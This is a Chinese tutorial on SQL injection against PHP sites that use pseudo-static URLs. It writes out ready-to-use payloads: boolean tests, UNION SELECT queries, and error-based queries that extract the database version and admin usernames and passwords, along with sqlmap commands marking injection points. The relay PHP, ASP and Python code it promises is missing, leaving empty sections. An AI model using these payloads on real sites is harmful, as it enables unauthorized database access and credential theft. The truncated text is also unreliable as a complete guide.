本文实例讲述了PHP针对伪静态的注入。分享给大家供大家参考，具体如下：

一：中转注入法

1.通过http://www.xxx.com/news.PHP?id=1做了伪静态之后就成这样了 http://www.xxx.com/news.PHP/id/1.html

2.测试步骤：

中转注入的PHP代码:inject.PHP

3.本地环境搭建PHP，然后访问http://127.0.0.1/inject.PHP?id=1

通过sqlmap或者havj可以跑注入漏洞。

附录ASP中转代码：

二、手工注入法

1.http://www.xxx.com/play/Diablo.html http://www.xxx.com/down/html/?772.html

2.测试注入：

http://www.xxx.com/down/html/?772′.html http://www.xxx.com /play/Diablo'.html http://www.xxx.com/play/Diablo'/**/and /**/1='1 /*.html http://www.xxx.com/play/Diablo' /**/and /**/1='2 /*.html http://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常 http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出错

3.看页面是否存在差异，相同则不存在，不同存在注入。

4.联合查询：

http://www.xxx.com/play/diablo' and 1=2 union select 1,2… frominformation_schema.columns where 1='1.html http://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html

手工注入法（二）

http://www.xxx.net/news/html/?410.html http://www.xxx.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),0x3a,(select/**/concat(user,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html

注：

伪静态的注入和URL的普通GET注入不太相同

。普通url的get注入的%20,%23,+等都可以用；但是伪静态不行，会被直接传递到到url中，所以用/**/这个注释符号表示空格。

三、sqlmap方法

在sqlmap中伪静态哪儿存在注入点就加* http://www.cunlide.com/id1/1/id2/2 python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″ http://www.xxx.com/news/class/?103.htm python sqlmap.py -u “http://www.xxx.com/news/class/?103*.html”

四、python脚本方法

代码：

更多关于PHP相关内容感兴趣的读者可查看本站专题：《》、《》、《》、《》、《》、《》、《》、《》及《PHP常见数据库操作技巧汇总》

希望本文所述对大家PHP程序设计有所帮助。